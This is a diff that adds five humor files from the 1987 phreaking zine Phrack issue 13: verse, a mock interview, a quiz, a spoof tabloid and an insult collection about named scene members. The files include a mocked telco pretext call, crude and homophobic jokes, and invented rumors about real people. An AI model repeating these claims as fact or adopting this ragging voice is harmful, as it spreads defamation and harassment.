diff --git a/phrack13/5.txt b/phrack13/5.txt
new file mode 100644
index 0000000..1d0817e
--- /dev/null
+++ b/phrack13/5.txt
@@ -0,0 +1,128 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #5 of 10
+
+                              Phreaks In Verse!
+                              -----------------
+
+                                      By
+
+                       Sir Francis Drake And Aiken Drum
+
+
+Welcome to this file,
+We hope you will spend a while,
+With us today.
+Perhaps you will be enlightened, in a way.
+
+This file is about phreaks,
+And hacks.  We have spent weeks
+writing about people in verse.
+You can pick who is worse,
+Our poetry or them.
+
+We mean no insult,
+And we hope as a result
+No on will kill us.
+'Cause we wouldn't like that OK?
+
+
+Shooting Shark
+--------------
+
+His name is Shark,
+He thinks UNIX is a lark.
+He can even log people out!
+(The legality of this we doubt)
+He looks like Robin Williams.
+And maby he'll make millions
+Writing UNIX software!
+(Wolf will tell him what to wear.)
+
+
+Oryan QUEST (Agent Orange)
+--------------------------
+
+Oh! Poor Oryan QUEST!
+Many call him a pest.
+"Stan", they cry,
+"Why do you lie?"
+The color of his car keeps changing,
+Perhaps its because I'm aging,
+But even if my brain is weak
+I know he said his car was RED last week,
+But today he said BLUE!
+Tell me the truth Stan, please do.
+But he knows quite a bit,
+And if he dosn't throw a fit,
+He can be an OK guy.
+
+Lex Luthor
+----------
+
+His real name is funny,
+(And it isn't Bunny)
+But a joke he is not,
+He knows a hell of alot.
+Of phreaks, and hacks, and little blue box.
+Hes head of LODH, a club that rocks.
+He's a secretive guy,
+But I think we all know why.
+(He even made me change this poem,
+ Oh well.  I owed him.)
+And no he dosn't sound like Yogi Bear
+No matter what Bill may dare
+to say.
+
+Knight Lightning
+----------------
+
+Knight Lighting likes dots, *'s, and slashes.
+He sits at the CRT so long he gets rashes.
+Making those NEAT title screens
+Is the thrill of his teens!
+But we all think he's a swell guy,
+'Cause he gives everything a try.
+
+Silver Spy
+----------
+
+Silver Spy!
+He's a conservative guy.
+He runs a elite BBS-- Catch-22.
+It dosn't get many posts, boo-hoo.
+But what other board can you see,
+Limericks when you log on...tee-hee.
+
+Bill From RNOC
+--------------
+
+Bill from RNOC
+Is from New Yawrk.
+Smarter than the average phreak,
+His opinions are not meak.
+He designs PBX's for fun,
+But he needs to spend more time in the sun.
+Soon you will see,
+Bill working for NT.      (*NT is Northern Telecom for you stupid people*)
+
+Taran King
+----------
+
+What a terrific guy is Taran King,
+Working on Phrack and runing MSP is his thing.
+He's a bit redneckish;
+(he won't admit he has a homosexual fetish.)
+But of the phreak community he is a piller,
+And without him we would wither.
+And if I keep patting his back,
+Maby he'll put this file in Prack.
+
+----------
+
+Oh no! I fear
+The end of the file is here.
+This file, about all these people who are ELITE,
+Can be followed by one word...DELETE.
+
+sfd
diff --git a/phrack13/6.txt b/phrack13/6.txt
new file mode 100644
index 0000000..6b1525f
--- /dev/null
+++ b/phrack13/6.txt
@@ -0,0 +1,110 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #6 of 10
+
+                R.A.G.
+
+
+           Rodents Are Gay
+
+
+        Starring Codes Master
+
+
+   Welcome to the first and last issue of R.A.G. This month we will feature a
+nauseating article about this months feature idiot - Codes Master. Remember,
+this file is not for you people with weak stomachs and parental discretion
+is advised. Rated R (for rodent).
+
+
+
+   First, a little introduction. The purpose of R.A.G. is to seek out and
+destroy potential idiots, assholes and posers. Obviously Codes fits into all
+these catagorys. We obtained a taped interview with Codes at his home in
+Mickey, Mississipi, and was able to get a few truths revealed. Here is a
+small transcript of the interview. "ME" is the interviewer, "HIM" is Codes.
+
+
+
+ME:  Nice place you have here. I see your into art. Ah, thats an interesting
+     peice there. What do you call it?
+HIM: Thanks. Thats called, "Mickey's Rat Trap". It shows the valiant Mickey
+     cleverly stealing the cheese from the trap without setting it off.
+     Actually, it was quite a bargain, and cost me mere $250.
+ME:  Thats interesting. You seem to have an obsession with Mickey Mouse and
+     other rodents (looking around I see portraits of Mighty Mouse, Jerry,
+     Speedy and others).
+HIM: Its just one of my hobbys.
+ME:  Okay, anyway, on with the interview. We understand that you consider
+     yourself, and I quote, "an expert on Primos". But we have seen
+     conflicting views when it comes to the truth of this. Alot of people
+     seem to think you don't know anything, and what you do know has been
+     learned in a very short period of time. Is there any truth to this?
+HIM: Uh, would you like something to drink? Some treats perhaps? I have
+     some excellent chees......
+ME:  No thank you. Back to the question, are you really a Prime expert?
+HIM: Well, I, uh...I guess you could say that. Have you ever read my Prime...
+ME:  No I havent. Sources tell me that you have claimed you had system access
+     on the Henco Prime on Telenet. But my sources know for a fact that you
+     haven't. Is there any truth to this?
+HIM: Well, no...
+ME:  Thats what I thought. Also, I would like to bring up the little war
+     between you and Evil Jay. You have claimed that the reason you didn't
+     see eye-to-eye was because both of you were working on seperate versions.
+     Yet, we both know that aside from versions lower than 19 there are
+     not too many changes so we really dont understand your comment.
+HIM: What kind of interview is...
+ME:  We also understand that you posted a message on Phantasie Realm that
+     contained the, and I quote, "new 617 Cosmos dialups". Yet these dialups
+     have been around for years and died more than a month before your post.
+     Any comments, Codes?
+HIM: I....
+ME:  Okay, how about your "Real Hackers, Phreakers and Trashers Guide".
+     You made some interesting comments on there, such as, "Real phreaks are
+     mostly pirates" and "Real phreaks dont have handles like Mr Phreak".
+     You obviously didn't take a look at your own handle, but we will skip
+     that little misunderstanding. The thing we find curious about the file
+     was that it was written in January of this year (1987). At this time, you
+     were a member on some respectful systems, such as Shadowspawn. What we
+     cant understand is why a phreak, who is on some pretty good boards, would
+     write such a rodentish file. Comments?
+HIM: You know how I feel about rodents. (HE glances fondly at Mickey portrait)
+ME:  I see. How long have you been hacking a phreaking?
+HIM: Uh, about a year or les...
+ME:  I see. Is it true you were an infamous TMC code poster last summer,
+     sometimes posting up to 30 TMC codes per message, but never anything else?
+HIM: HEY, NOW WAI...
+ME:  I see. Isn't it true that the majority of your posts since you have been
+     accepted on some major boards, have been advertisments for your somewhat
+     faulty Prime hacking files?
+HIM: You have to advertise nowadays to get any recognition for anything.
+     You know?1
+ME:  Well, isn't that special. We got a chance to see your application to
+     Atlantis, and noticed that you said you had experience with Vax/VMS, RSTS
+     and some other operating systems. But close sources who know you well
+     tell us this is a lie, and if you did know anything its probably how to
+     get a directory, chat with a user and other general crap. Is this true?
+HIM: WHAT THE HELL KIND OF INTERV...
+ME:  Well thats about it for today. Thanks alot Codes Master. May the force
+     be with you.
+HIM: WAIT A...(He starts to grab the interviewer...to Codes amazement, a mask
+     falls off and...)
+HIM: EVIL JAY?!?!1
+ME:  Thats right! We have you on tape now buddy. Your life is ruined...
+
+
+
+    The rest is to graphically violent to show here. But Jay emerged unscathed
+  to hand us the copy of this interview. Codes was last seen walking towards
+  Katheryn Hamilton Mental Center and had no comment.
+
+
+    So, we have unraveled the mysterys of one of the greatest posers of our
+  time and exposed the man to what he really was all the time. A mouse.
+  A fiendish poser, seeking to infilterate the higher levels of hacking and
+  phreaking, for his own greedy amusement. Everything in this article was
+  true, and we advise sysops to think twice about admitting Codes "Mighty
+  Mouse" Master on your bulletin board system. Thank you and have a nice day.
+
+
+                                                                -Tom
diff --git a/phrack13/7.txt b/phrack13/7.txt
new file mode 100644
index 0000000..5f323b0
--- /dev/null
+++ b/phrack13/7.txt
@@ -0,0 +1,177 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #7 of 10
+
+    ARE YOU A PHONE GEEK???
+    -----------------------
+
+
+    Take this simple test to find out! A word of caution however...This file
+is not a measurement of your intelligence or sex appeal. Read on at your own
+risk!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+
+
+    Simply answer the following questions completely and truthfully.
+
+
+    1: You are out on a date with an amazing looking chick. You are at a drive
+in and notice that she is getting rather hot. She wraps her arms around you
+and lets you know she means business by her passionate pelvic thrusts. However,
+you lose concentration when you notice a Bell truck has pulled in next to you,
+and the driver is asleep (boring movie). What do you do???
+
+
+    A: Push your girlfriend away and sneak out the door quietly, in hopes of
+scoring on countless hard to get goodies such as lineman's tools, test sets,
+manuals, and telephone numbers to engineer.
+
+    B: Give her the end of a soda bottle and tell her you'll be right back.
+
+    C: Ignore the silly Bell truck and continue with your date.
+-------------------------------------------------------------------------------
+
+    2: You are in the middle of town. It is cold and raining. You have sneaked
+out of your house to the local fortress to conduct some experiments.
+When making a call to your fave LDS, you hear an MF routing! What do you do?
+
+    A: Continue your call as normal, making a mental note of the occurrence.
+
+    B: Quickly hang up and repeat the procedure in the same fashion, in hopes
+of getting the routing again, so you may memorize it and post about it.
+
+    C: Talk in whispers and glance over your shoulder for Bell security and FBI
+vans coming your way.
+-------------------------------------------------------------------------------
+
+    3: You are in your school's office for disruptive behavior and notice that
+they're having some difficulties with call completion. What do you do?
+
+    A: You jump up and investigate the source of the problem, calling various
+test numbers while you're at it, performing a full battery of tests upon the
+line.
+
+    B: You grab the phone and dial the repair service, going into a long
+technical discussion on bandwidth limitation properties upon PBX type systems.
+
+    C: You don't give a fuck and let the bastards figure it out for themselves
+since they're the ones who are punishing you for pissing in the corner of the
+study hall.
+-------------------------------------------------------------------------------
+
+    4: You've had a little too much to drink and aren't driving well. Suddenly,
+a telephone pole appears in front of your car. You have a head on collision.
+You feel blood dripping from the gash in your forehead. What do you do?
+
+    A: You climb out of your smashed car and decide to climb the pole and
+investigate the aerial distribution box for possible notes left by linemen.
+
+    B: You whip out your notebook and take note that there is a can up there
+and put the note away for future reference. You then go to the hospital.
+
+    C: You wail in dismay that you might have forgotten your new codes in the
+trauma.
+-------------------------------------------------------------------------------
+
+    5: You are on your favorite BBS when you see some loser asking questions
+about tracing. What do you do?
+
+    A: You ignore the question because you're too elite.
+
+    B: You rag the user on every sub boaoard and in mail because ESS DOES
+trace you when you make too many calls to the same number.
+
+    C: You leave the user twelve pages cpied directly from a manual about
+the call trace procedure along with some personal comments on how Bell puts
+DNR's on lines if the words 'phreak', 'hack' or 'code' is spoken over it.
+-------------------------------------------------------------------------------
+
+    6: Your mom picks up the phone during a conference and overhears someone
+harassing a DA supervisor. Later she asks you about it. What do you do?
+
+    A: Say 'Mom, I know you're not going to believe this, but there's a new
+company that connects you to a pre-recorded phone conversation for a nominal
+users fee.'
+
+    B: Say you don't know who it was but then contradict yourself later by
+talking about how neat it was to hear Pee Wee abuse a DA supervisor.
+
+    C: Get violently sick and leave the room.
+-------------------------------------------------------------------------------
+
+    7: You have a little static on your telephone line. What do you do?
+
+    A: You call up your CO and lodge a formal complaint, branding the personnel
+as lazy, inefficient, and decadent, telling them how much of a better job a
+true telecom buff like yourself could do.
+    B: Call your local tone sweep to see if Bell is tracing your line.
+
+    C: Hide under your bed until further notice.
+-------------------------------------------------------------------------------
+
+    8: Your CO is having open house. You plan to go with all enthusiasm, when
+you hear that Cindy, whose body measurements are 36-24-36, is having a 20 keg
+party with no cover charge. Cindy has expressed deep lust for you within recent
+weeks. What do you do?
+
+    A: Telephone Cindy covertly from your CO where you are taking the tour and
+tell her you're sorry, you can't make it, but you have some great new numbers.
+
+    B: Dress in a ninja suit and sneak into your CO through a window.
+
+    C: Rush straight to Cindy's to find out that her new 6 foot 10 boyfriend
+is supervising the fun and games.
+-------------------------------------------------------------------------------
+
+    9: You go to a shopping mall where there is a demonstration on a new AT&T
+phone. The speaker mentions telephone switching for a brief moment. What do
+you do?
+
+    A: Run to the nearest restroom and relieve the tension in your bladder.
+
+    B: Push your way to the front of the crowd of telephone illiterates and
+begin a heated debate on switching systems and analog to digital conversion.
+
+    C: Whip out your note pad and remove pencil from behind ear to take notes.
+-------------------------------------------------------------------------------
+
+    10: You wake up in the morning. What do you do?
+
+    A: Forage into your box of trash for interesting tidbits that you may have
+missed last night.
+
+    B: Pick up the telephone and take reassurance that the Telco hasn't turned
+off your dial tone yet.
+
+    C: Admonish yourself for forgetting to set the MF routing as your alarm
+clock the night before.
+-------------------------------------------------------------------------------
+
+    For each question that you answered A on, give yourself 5 points. For each
+B answer you gave, give yourself 3 points. For each C Answer, give yourself 1
+point. Now go back and add up your totals on your handy dandy pocket calculator
+and see how you have tested in the G.I.Q (Geek Ignorance Quotient).
+
+
+50 points and above-  You are fucking a amazing, and not just elite, not just
+super elite, but super amazingly elite!!!! Pat yourself on the back a few hun-
+dred times, you deserve it.
+
+
+30 points and above- You are not quite as fucking a amazing as those in the
+above category, but you're close behind. Keep up the good work and soon you'll
+be hearing from the GIQ League!
+
+
+10 points and above- You are rather sad, because if you haven't realized that
+this point scoring system is inaccurate and inefficient, not to mention mathe
+matically incorrect, then you should stick to watching Scoody Doo reruns
+instead of wasting your time trying to be elite, which will never happen anyway
+to anyone who had the ingorance to put up with this worthless exam up till now.
+
+
+HAHAHAHAHAHAH!!!!!!! L0ZER!!! YOU JUST WASTED A GOOD PORTION OF YOUR TIME
+READING THIS, BECAUSE YOU THOUGHT IT WAS GOING 2 BE SOMETHING G00d!!!!!!!HAHA
+DAMN I'M ELITE&!$"%"C$"!$!#!3223
+
+
+-------------------------------------------------------------------------------
diff --git a/phrack13/8.txt b/phrack13/8.txt
new file mode 100644
index 0000000..8677289
--- /dev/null
+++ b/phrack13/8.txt
@@ -0,0 +1,170 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #8 of 10
+
+%%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%%
+% +                                      +  %
+%     Phrack Presents...                    %
+%                                           %
+*   Computerists Underground News-Tabloid   *
+%             By  Crimson Death             %
+%                                           %
+% +                                      +  %
+%%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%%
+
+     Welcome to the first issue of Computerist's Underground News-Tabloid. Now,
+I am sure you are thinking, "aren't 'news' and tabloid basically synonymous?
+Isn't that a bit redundant?". Hell, YES! It is! But "we" don't care. Names
+don't mean a DAMNED thing to us! Hell, NO! What we care about it NEEEEWS! Hard-
+core, FACTUAL news. That's why we tell it like it is. All Bullsh-t aside. You
+don't like what you're seeing? Don't read it! These are the "Bob"-damned facts,
+buddy. This is a tough world we live in. Things aren't always as pretty as we'd
+like them to be. It's a Dog-Eat-Dog world. If you can't take it, you won't make
+it, and it's as simple as that. So read and learn! It's OUR world, and only WE
+can change it, so keep informed!
+
+                                                Editor-in-Chief
+                                                Crimson Death
+-------------------------------------------------------------------------------
+DREADFUL DIGITAL DILEMA
+
+     "IT'S TRUE!", say top scientists at South Hampton Institute of Technology,
+"Within three years, the world will face its worst dilema in ages." A new
+strain of virus called C-AIDS (Computer/Artifical Intelligence Deficiency
+System) will begin attacking micro-chips around the globe.
+      Where is it coming from? Scientists aren't quite sure, but believe it to
+be a combination of many industrial waste products that float around in the
+air, and human virus! How can this be? Well, that is uncertain right now.
+      Dr. Harry Koch claims, "We just don't know, but it's comming!" Religious
+groups claim it's a sign from God to "slow down". Our resident psychic believes
+it's a plague sent down by aliens to hinder us in catching up to their
+technology.
+      Just what will this mean? The downfall of many businesses, government
+problems, stock market crash, media troubles! You name it! Almost everything is
+run by computers these days. The world will be in shambles. Barbarian times
+will set in! People will start using their minds! Something needs to be
+done, and QUICK!
+-------------------------------------------------------------------------------
+QUICK QUOTES
+
+      "IT'S TRUE," says:
+
+Line Breaker, "I ran a Commodore 64 BBS with 100 megabytes of storage!"
+American Telephone and Telegraph, "Our rates really ARE the cheapest!"
+The Traveller, "My Jackin Box plans work! You just play with the little lever
+                until it pops up!"
+Cheshire Catalyst, "I did play Shaggy on Scooby Doo...but, hey, that's all in
+                   the past now!"
+-------------------------------------------------------------------------------
+ROBOT CLONE SEEKS PHREAKS AND TRACKS HACKS
+
+      "IT'S TRUE!", say our inside sources, "Bell Telephone Labs is currently
+working on a high tech robot to seek out Phone Phreaks and Hackers. I have seen
+one...they're almost life like, and it's scary!"
+      Right now, there are only a few, but BTL plans to soon put them into mass
+production. This means Bulletin Board Systems throughout the U.S. will be
+teeming with these undercover agents. Two known NERD's (Neurologically
+Enhanced Robotic Detectives) are John Maxfield, a Detroit based android running
+a business called Board Scan; and Daniel Pasquale, a former officer of the law,
+located in California.
+      How can we protect ourselves? Well, we're not quite sure, but our
+resident scientists are working on it now!
+      More on this topic as it unfolds.
+-------------------------------------------------------------------------------
+      Latest news on Robot Clones: Rumor has it that N.E.R.D., John Maxfield
+has contracted a premature case of C-AIDS. If asked, he only denies, but an
+inside agent of ours at BTL said that he has been coming there for treatments.
+-------------------------------------------------------------------------------
+FAMED PHREAK FATHERED BY FUZZIES
+
+      "IT'S TRUE!", says a close friend of Scott Ellentuch (better known as
+Tuc) the sysop of RACS-III BBS, and former co-editor of Tap Magazine. "He
+doesn't like to talk about it, but he was infact raised by a pack of male
+Guinea Pigs!"
+      At the tender age of three months old, the sibling Tuc was abandoned on
+a doorstep in Manhattan. Unfortunately for the tot, the owner of the house was
+an old druken man, who threw the poor baby into the trash before his wife got
+home and found it. Luckily, a pack of wandering Guinea Pigs were on the hunt
+for food, an happened upon the child. They then took him to their nesting in
+Central Park, and raised him like one of their own.
+      One day, at the age of 10, Tuc was apprehended by the police after being
+caught shopplifting a bag of cedar chips at a local pet shop. It was decided
+in court that he was a not a criminal, but just misguided because of his fate.
+He was then put in an adoption home until taken in by the Ellentuch's.
+      A crack reporter of ours decided to seek out these kindly rodents, and
+ask about any grievances they may have about little "Zippy" (the name given
+to him by his furry brothers). When questioned, they only replied with a
+squeek, and left a few dung pellets. I suppose that's their way of saying,
+"Come on back, Zip, we miss ya..."
+-------------------------------------------------------------------------------
+NEW PHREAK KLASS CO-SYSOPED BY DEMON FROM HELL
+
+      "IT'S TRUE!", says respected Demonologist, Dr. Jack Goff, from Hawaii
+State University, founder of the Academy of Supernatural Studies. "A modem
+user, who dons the handle 'The Executioner' has been possessed by an evil
+demon from the netherworld!"
+      The Executioner, of New Jersey State, co-sysop of the revived Phreak
+Klass 2600 (ran by The Egyptian Lover), and the 'Leader' of the also-revived
+PhoneLine Phantoms, was "once a nice person", according to many of his old
+friends. What caused his plunge into the sadistic-egotistical world he now
+lives in? Black magick!
+      His mother spoke with us. "Ever since he ate that bad can of Spaghettios,
+you know...the ones with the sliced franks, he hasn't been the same.
+Day-by-day, he gets worse-and-worse. It's like living with...a...a...monster!"
+At that point, the poor woman broke into tears. But, she couldn't have been
+more on the money if she were sitting on it! The truth is, while eating a plate
+of those Spaghettios (you know, the one's with the sliced franks in them),
+he was reading out of a book he bought the week before called "101 Ways to
+Summon a Demon". Thinking it was all a bunch of nonsense, he read one of the
+'prayers' aloud. From then on, the poor boy has been inhabited by the demon,
+Isuzu.
+      Sorry to say, Dr. Goff claims this demon is a "one of a kind". So far,
+there are no known ways to Ex-orcise (pun intended) the dreaded Isuzu. "It's
+a shame for the lad...I guess we will have to put up with his sadistic, ego-
+tistical, obnoxious, rude, loud, ragging posts and attitudes for awhile."
+-------------------------------------------------------------------------------
+SCIENTIFIC STUDIES SHOW...
+
+      If you put an infinate number of Taran King's in a room for an infinate
+number of years, you probably still couldn't get Metal Shop Private to stay up
+for over 30 days.
+-------------------------------------------------------------------------------
+LOD/H MEMBER DISMEMBERS MEMBERS
+
+      "IT'S TRUE!" says an anonymous member of the 'Modem World', "Until now,
+it has been all hush-hush, but in reality, there are only a couple LOD/H
+members alive today...it's frightening, and it's hard to believe, yet it
+happened."
+      Just what did happen you ask? What is the truth behind the drop-out of
+many LODers? How come the group has dwindled to a petty few? Murder! Yes, cold-
+blooded throat-slashing MURDER! "Who? How? Why? ", you say? Well, that's what I
+am here for, and that's what you're going to find out.
+      In December of '86, an LOD/H meeting was held at The Mariott, in
+Philadelphia, in which all of the members had attended. During a discussion on
+the current MCI cracked-down, someone said, "Hey, let's pause this conver-
+sation for 30 minutes, 'Punky Brewster' is coming on." It was at this point
+that everyone in the room quieted, and The Videosmith stood up and threw a
+glass of Pink Lemonade at the TV. He then ran out of the room yelling "Fuck
+this shit! It all makes my balls itch!" Moments later he returned with a 17
+inch machete, and a can of Raid. He had shaved his head, and was wearing a
+shirt that said, "Buckwheat say 'Drugs NOT O-Tay!'" He was obviously deranged.
+      He proceded to spray everyone's hair with raid, until the can finally
+ran out. As the group stood in awe, he slashed all of them into tiny bite-
+size pieces...one by one. He then sat down, and watched the rest of Punky
+Brewster, and to this day, has no recollection of what had happened. Only
+those few, who had been at Denny's at the time, remained.
+      Following this massacre, he was treated at the Jason Voorhees Institute
+for the Criminaly Insane, and is no longer a member of LOD/H.
+-------------------------------------------------------------------------------
+      Well, that about raps it up for the first issue of the Tabloid. There may
+be a few more in the future, I am not sure at this point right now. I hope you
+all enjoyed it, and that only AT&T, The Traveller, and Line Breaker were of-
+fended.
+      I'd like to have some comments on how you felt about it, so let me know.
+Also, let me know if you figured out all of the puns and acronyms.
+-------------------------------------------------------------------------------
+Call these Awesome Boards:
+
+Lou's RBBS.................215-462-4335 Sysop: Louis Acok
+Grendel's Liar (sic).......415-679-2600 Sysop: Stan the Man
+KKK-Kool BBS...............404-343-5397 Sysop: Kurt Waldheim
diff --git a/phrack13/9.txt b/phrack13/9.txt
new file mode 100644
index 0000000..fea449c
--- /dev/null
+++ b/phrack13/9.txt
@@ -0,0 +1,423 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #9 of 10
+
+[+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+]
+ ||-----------------------------------------------------||
+ ||                                                     ||
+ ||             ______The Executioner______             ||
+ || PHRACK XIII|                           |PHRACK XIII ||
+ || ------------ Thanks:  Knight Lightning ------------ ||
+ || |PHRACK INC|          The Phreakazoid! |PHRACK INC| ||
+ || --------------------------------------------------- ||
+ || |                                                 | ||
+ || | Phreak Klass |The Best of Sexy-Exy| Phreak Klass| ||
+ || | 806-799-0016 |--------------------| 806-799-0016| ||
+ || |   EDUCATE    |(c) 1987 Sexy-Exy TM|   EDUCATE   | ||
+ || |              |                    |             | ||
+ || |              |  Released April 1  |             | ||
+ || |                                                 | ||
+ || --------------------------------------------------- ||
+[+]]]]]]]]]]]]]]]]]]]]]]]]]]RAG[[[[[[[[[[[[[[[[[[[[[[[[[[+]
+
+     Welcome to "The Best of Sexy-Exy", a conglomoration of
+rags/insults that have been gathered over the past year or
+so. All rags are original and are the creation of my genius
+mind. I think that this installment is appropriate for the
+13th issue of PHRACK.
+
+     NO rags are to be taken seriously, they are merely for
+entertainment.
+
+     There have been events beyond my control during the
+process of writing this file, they are enclosed in "**".
+Thank you.
+
+============================================================
+     "Doc Holiday: The man, The myth, The Loze"
+Doc Holiday is a man of many diverse talents. I think it's
+my place to let the whole world know just how much of a
+mental giant he is.
+
+------------------------------------------------------------
+First, let's discuss how he manages to engineer the toughest
+of AT&T's network men. Here is a typical conversation
+between Doc and AT&T. I will interject my comments in
+between the brackets [ and ]. Doc will be represented by a
+DH.
+<RING>
+AT&T: Hello, AT&T directory assistance, may I help you?
+      [Boy, this guy is a REAL powerhouse to engineer,
+       think MAYBE Doc will be able to get anything from
+       him?]
+DH: Hi, this is Pee Wee Herman from Illiois Bell, DA waste
+    removal. I am having a problem connecting an inter-
+    office call, do you think you could give me the number
+    to the SCC in area code 201?
+    [Gee, he picked a REAL important reason to call didn't
+     he?]
+AT&T: Well, sir, I don't think I can do that, I can give
+      you the number for the business office, maybe they can
+      help you. (AT&T thinks: bahehahhe, stupid kid).
+<RING>
+NJ BELL: Hello, New Jersey Bell, all operaters are busy now,
+         please hold, and your call will taken in turn.
+DH: Ho hum...[unzips his pants]
+NJ BELL: [Elevator music]
+DH: ahhhhh...[Doc, why is your left hand having spasms?]
+NJ BELL: Hello, New Jersey Bell, this is Susan.
+DH: Uh, yeah, hold on a sec...[wiping away the fluid from
+                               reciever.]
+DH: Uh yeah, this is Dick Little, from Illinois Bell, I was
+    wondering if you could give me your 201 CN/A?
+    [Uh, Doc, hate to break this to you, but 201 has
+     no CN/A.]
+NJ BELL: Uh yeah, hold on...
+         [NJ BELL: Must be one of those trainees, they have
+          to get because of affirmative action.]
+NJ BELL: I'm sorry, I can't give you that number.
+DH: Well, here in this small town, it's kinda hard to get
+    around, so could you please give me someone I can refer
+    to?
+[At this time, Doc's dog wanders into his room, and
+ begins to bark and snarl and generally acts like
+ Doc's mom.]
+DH: Uh, y'know, this town is SO small, you can hear the dog
+    barking across the street. [Wow, fast thinker]
+DH: I'm not used to this small town, I'm used to a big city.
+NJ BELL: Oh, what town are you in?
+DH: Uh, it's this little town outside Illinois.
+    [Hmm, he's supposed to be from Illinois Bell but he is
+     not in Illinois? WHAT AN ENGINEER!!!]
+NJ BELL: Oh, is that so. [NJ BELL: Damn kid should at least
+                          know his geography.]
+NJ BELL: What big city did you live in before?
+DH: Oh, I used to live in New York City.
+    [Sure, Doc, you got your MASSIVE southern drawl in the
+     boro of Brooklyn...]
+DH: I mean, uh, I only lived there for 3 months.
+    [Give up Doc, you screwed up big time, you're gonna
+     get pounded.]
+[FLASH: Doc's mom gets on the phone.]
+Doc's Mom: ROB, TIME FOR YOU CELLO LESSON!!!!
+DH: Yeah, uh, well, my seceratary, has just reminded me that
+    I have to pick up my kid for his music lesson.
+NJ BELL: <chuckle> Sure, <growing giggle> I guess I will
+         talk to you later <crescending into hysterical
+         laughter, falling off his chair in a spasmodic
+         echo of immense laughter>.
+<CLICK>
+Boy, Doc, I gotta hand it to you, in that conversation, you
+sure showed him your intellegence. It's ok, that you don't
+know where you are, and it's ok that your mom interrupted
+you twice, barking both times into the phone. But, hey,
+I am not done celebrating you yet, here's more of "The Story
+Of Your Life!"...
+** The date is now March 14, Doc Holiday has just been put
+out of action by Oryan QUEST, shutting off both of Doc's
+lines. **
+** The date is March 30, I have just heard that Doc has been
+busted for COSMOS hacking. **
+------------------------------------------------------------
+TOK, Tribunal of Knowledge, is a group to be admired,
+they're conglomoration of massive intellegence and
+normality have all of the phreak/hack world stunned.
+Prophet's education at Devry Tech, you know the school where
+you get a free box of tools when you enter, is a definate
+school for those who have superior mental ability. And then
+there's Solid State, or by name, Nate. By the way, do you
+know what the name Nate means? Let's look in the Websters
+Collegiate Doctionary...
+NATE \NAT\ n : skin that stretches from the base of the
+               scrotum to the opening of the anal cavity.
+Boy, Nate, your parents must have loved you...
+And I haven't forgotten you, High Evolutionary, you massive
+stud you. HE, is on the school football team. [Actually, he
+plays text-graphics football on his commodore and thinks he
+plays football, but we'll let him have his fantasy.]
+Here is my tribute to T0K!1!
+TOK! Second Chapter: Nothing this bad ever dies.
+------------------------------------------------
+We're TOK and we're proud to say,
+Even Buckwheat says that we're O'Tay!
+We're gonna make LOD jealous of us,
+With our computers we get from Toys R Us!
+We'll take the hack world by attack,
+With our 100+ files we put in Phrack.
+Our reformed group numbers only to three,
+We'll be famous like Larry, Moe and Cur-ly!
+Hey TK do a prophile on us, we want some press,
+We'll tell ya about our hobbies like playing Phone chess!
+Ask us about our ability and we'll gladly exposulate,
+About the great acomplishments of Solid State!
+And Prophet too, boy is he a Joe Hacker,
+He talks to Bill Landreth, aka The Cracker.
+He spits out logins and passwords all the time,
+Getting busted by feds is his favorite past time.
+Then there's High Evolutionary, the leader of the pack,
+Who does his hacking in a neighbor's tool shack.
+He likes to hack Unix's, VMS and The Source,
+He likes to play football, on his computer of course.
+We're elite, we're the best there will ever be,
+We're just jealous that we're not in cDc.
+** The date is now March 21, I have just learned that Evil
+Jay and Ctrl-C have been added to the list of TOK
+groupies.**
+------------------------------------------------------------
+Dr. Doom Rag, the extended dance version to the tune of
+"Beverly Hillbillies".
+Now, listen to a story about a boy named Doom,
+Poor modem geek who would never leave his room.
+Then one day he was talking on the phone,
+When up in his pants came a miniature bone.
+Penis, that is, kinda like a toothpick.
+Well the next thing you know ol' Doom puts up a board
+He runs it on a Commie 'cause it's all he can afford.
+He makes his board private and he thinks he is a phreak,
+<Idea Block...sorry>
+------------------------------------------------------------
+     I have seen alot of files written lately and needless
+to say, alot of them need a lot of work. Sooo in my infinite
+charitableness, I ha ve decided to write a file on how to
+write a file. I will list EVERY IMPORTANT aspect of writing
+a file and all the inside secrets on how it will make you
+look a like a real cool dude (Let's face it, we write files
+to promote ourselves.).
+     The first and most important thing to writing a file is
+your border. It has to be flashy and must include the name
+of your k-kool group which you are part of even though no
+one in the group helped you but you will still put their
+name down to promot e yourselves. Of course, the title must
+be set in it's
+own section of the border.
+                Example
+                -------
+[$%$]\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\[$%$]
+\===/                                          \===/
+ [+] Metro!        =->Dr. Doom<-=        Metro! [+]
+ $$$ ------           --------           ------ $$$
+ %^% (^name of group) (name must be             %^%
+ (0)                   emphasized)              (0)
+ *#*                                            *#*
+ RAD     Present:                               RAD
+ |+|(always use 'present')                      |+|
+ :::                                            :::
+ @!@     File #30 > ISDN!!!!!!!!!!!             @!@
+ %!%                                            %!%
+ %!% (ALWAYS say how many OTHER worthless files %!%
+ %%%  you have written so it makes you look     %%%
+ |||  productive)                               |||
+[$%$]//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//[$%$]
+     That is an example of a good border, notice all
+the neat ASCII graphics and how he uses space to put
+his group in the file too.
+     The content of your file is important also.
+Here is a list of rules you should follow.
+     1. ALWAYS be confusing, it makes you look li ke you
+        know what you are talking about, even if you don't.
+     2. ALWAYS use as many acronyms as you can, it will make
+        your reader look up to you because you know that
+        AACTU stands for Acronyms Are Cool To Use.
+     3. ALW AYS be condescending to your reader as if he/she
+        should know what the hell you are talking about even
+        if you are just rambling to fill space.
+Corollary: ALL FILES SHOULD BE AT LEAST 40 SECTORS
+     4. ALWAYS give 10-15 examples that really don't show
+        what you are talking about, but will make the reader
+        think that whatever you are writing on, somehow has
+        some use when it doesn't.
+     5. ALWAYS put in diagrams and pictures, the ASCII will
+        confuse them so much that you can say just about
+        anything that will describe the diagram.
